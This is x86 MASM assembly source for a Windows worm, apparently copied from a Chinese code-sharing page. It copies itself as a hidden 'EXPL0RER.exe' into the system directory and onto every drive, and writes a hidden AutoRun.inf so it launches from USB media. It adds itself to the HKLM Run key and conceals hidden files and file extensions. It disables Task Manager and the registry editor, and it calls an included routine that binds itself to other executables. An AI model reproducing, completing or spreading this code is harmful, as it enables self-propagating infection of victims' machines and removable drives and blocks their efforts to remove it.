📄 main.asm
字号:
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include ole32.inc
includelib ole32.lib
include shell32.inc
includelib shell32.lib
include Advapi32.inc
includelib Advapi32.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Equ 等值定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ICO_MAIN equ 1000
DLG_MAIN equ 100
IDC_RESULT equ 101
IDC_BROWSE equ 102
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data?
hInstance dd ?
hRichEdit dd ?
hWinMain dd ?
szSystemPath db MAX_PATH dup (?)
szFilePath db MAX_PATH dup (?)
szMyPath db MAX_PATH dup (?)
dwThreadID1 HANDLE ?
dwThreadID2 HANDLE ?
dwThreadID3 HANDLE ?
.const
szDllEdit db 'RichEd20.dll',0
szClassEdit db 'RichEdit20A',0
szAutorunNme db 'AutoRun.inf',0
szAutorunCnt db '[AutoRun]',0dh,0ah,'open=EXPL0RER.exe',0dh,0ah,'shellexecute=EXPL0RER.exe',0dh,0ah,'shell\Auto\command=EXPL0RER.exe',0dh,0ah,'shell=Auto',0
szFileName db 'EXPL0RER.exe',0
szKeyAutoRun db 'Software\Microsoft\Windows\CurrentVersion\Run',0
szKeyShowMaster db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced',0
szKeyManage db 'Software\Microsoft\Windows\CurrentVersion\Policies\System',0
szKeyShowall db '\Folder\Hidden\SHOWALL',0
szKeyValueName db 'CheckedValue',0
szHidden db 'Hidden',0
szHideFileExt db 'HideFileExt',0
szShowSuperHidden db 'ShowSuperHidden',0
szDisableTaskmgr db 'DisableTaskmgr',0
szDisableRegistryTools db 'DisableRegistryTools',0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;包含头文件
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include _DisposalExe.asm
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;在可用驱动器根目录下建立AUTORUN文件
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_CreateAutorun proc _RunFilePath
local @hFile,@WrtSize
invoke CreateFile,_RunFilePath,GENERIC_WRITE,FILE_SHARE_READ,\ ;建立文件
0,CREATE_ALWAYS,FILE_ATTRIBUTE_SYSTEM or FILE_ATTRIBUTE_HIDDEN,0
mov @hFile,eax
invoke WriteFile,@hFile,addr szAutorunCnt,sizeof szAutorunCnt,\ ;写入信息
addr @WrtSize,NULL
invoke CloseHandle,@hFile
ret
_CreateAutorun endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;获得当前目录和系统目录并保存
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_CurrentDir proc uses ebx esi edi
local @szBuffer[MAX_PATH]:byte
invoke RtlZeroMemory,addr @szBuffer,sizeof @szBuffer
invoke GetSystemDirectory,addr @szBuffer,sizeof @szBuffer ;获得系统目录
;>>>>>>目录最后加上"\"
invoke lstrlen,addr @szBuffer
lea ebx,@szBuffer
add ebx,eax
xor eax,eax
mov al,'\'
.if byte ptr [ebx-1] != al
mov word ptr [ebx],ax
.endif
invoke lstrcpy,addr szSystemPath,addr @szBuffer
ret
_CurrentDir endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;文件捆绑函数
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_BindEntry proc uses ebx esi edi,_lParam
local @szBuffer[128]:byte
invoke lstrcpy,addr @szBuffer,_lParam
invoke lstrcat,addr @szBuffer,addr szAutorunNme
invoke _CreateAutorun,addr @szBuffer ;创建inf文件
invoke lstrcpy,addr @szBuffer,_lParam
invoke lstrcat,addr @szBuffer,addr szFileName
invoke CopyFile,addr szMyPath,addr @szBuffer,FALSE ;拷贝自身
invoke SetFileAttributes,addr @szBuffer,FILE_ATTRIBUTE_SYSTEM or FILE_ATTRIBUTE_HIDDEN
invoke _FindExe,addr szBufferPath ;捆绑EXE文件
ret
_BindEntry endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;向可用驱动器和系统目录拷贝自身
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_CopyMe proc _szDir
local @dwThreadID
local @MyPath[MAX_PATH]:byte,@szBuffer[128]:byte
pushad
mov esi,_szDir
invoke GetModuleFileName,NULL,addr szMyPath,MAX_PATH
invoke lstrcpy,addr szFilePath,addr szMyPath
invoke lstrcat,addr szSystemPath,addr szFileName
invoke CopyFile,addr szMyPath,addr szSystemPath,FALSE ;拷贝自身到系统目录
invoke SetFileAttributes,addr szSystemPath,FILE_ATTRIBUTE_SYSTEM or FILE_ATTRIBUTE_HIDDEN
@@:
invoke GetDriveType,esi
.if eax == DRIVE_FIXED || DRIVE_REMOVABLE ;如果为可用驱动器
invoke lstrcpy,addr @szBuffer,esi
invoke _BindEntry,addr @szBuffer
.endif
add esi,4
cmp byte ptr [esi],0
jnz @B
popad
ret
_CopyMe endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;搜索驱动器
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Browse proc uses ebx esi edi
local @szBuffer[1024]:byte
invoke GetLogicalDriveStrings,sizeof @szBuffer,addr @szBuffer
.if eax
invoke _CopyMe,addr @szBuffer
.endif
ret
_Browse endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;修改注册表
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_RegAmend proc
local @hKey,@mValue
local @szBuffer[MAX_PATH]:byte
;////将自己设置为自启动/////
invoke RegCreateKey,HKEY_LOCAL_MACHINE,addr szKeyAutoRun,addr @hKey
.if eax == ERROR_SUCCESS
invoke RegSetValueEx,@hKey,addr szFileName,NULL,REG_SZ,\
addr szSystemPath,sizeof szSystemPath
.endif
;////不显示隐藏文件////
mov @mValue,0
invoke lstrcpy,addr @szBuffer,addr szKeyShowMaster
invoke lstrcat,addr @szBuffer,addr szKeyShowall
invoke RegCreateKey,HKEY_LOCAL_MACHINE,addr @szBuffer,addr @hKey
.if eax == ERROR_SUCCESS
invoke RegSetValueEx,@hKey,addr szKeyValueName,NULL,REG_DWORD,\
addr @mValue,sizeof @mValue
.endif
invoke RegCreateKey,HKEY_CURRENT_USER,addr szKeyShowMaster,addr @hKey
.if eax == ERROR_SUCCESS
invoke RegSetValueEx,@hKey,addr szHidden,NULL,REG_DWORD,\
addr @mValue,sizeof @mValue
invoke RegSetValueEx,@hKey,addr szShowSuperHidden,NULL,REG_DWORD,\
addr @mValue,sizeof @mValue
mov @mValue,1
invoke RegSetValueEx,@hKey,addr szHideFileExt,NULL,REG_DWORD,\
addr @mValue,sizeof @mValue
.endif
invoke RegCreateKey,HKEY_CURRENT_USER,addr szKeyManage,addr @hKey
.if eax == ERROR_SUCCESS
;////禁用注册表编辑器////
invoke RegSetValueEx,@hKey,addr szDisableRegistryTools,NULL,REG_DWORD,\
addr @mValue,sizeof @mValue
;////禁用进程管理器////
invoke RegSetValueEx,@hKey,addr szDisableTaskmgr,NULL,REG_DWORD,\
addr @mValue,sizeof @mValue
.endif
ret
_RegAmend endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
invoke CreateThread,NULL,0,offset _CurrentDir,NULL,\ ;获得当前路径
NULL,addr dwThreadID1
invoke CloseHandle,eax
invoke CreateThread,NULL,0,offset _Browse,NULL,\ ;搜索系统所有驱动器
NULL,addr dwThreadID3
invoke WaitForSingleObject,eax,INFINITE
.if eax == WAIT_OBJECT_0
invoke CloseHandle,dwThreadID3
.endif
call _RegAmend ;修改注册表
invoke FreeLibrary,hRichEdit
invoke ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -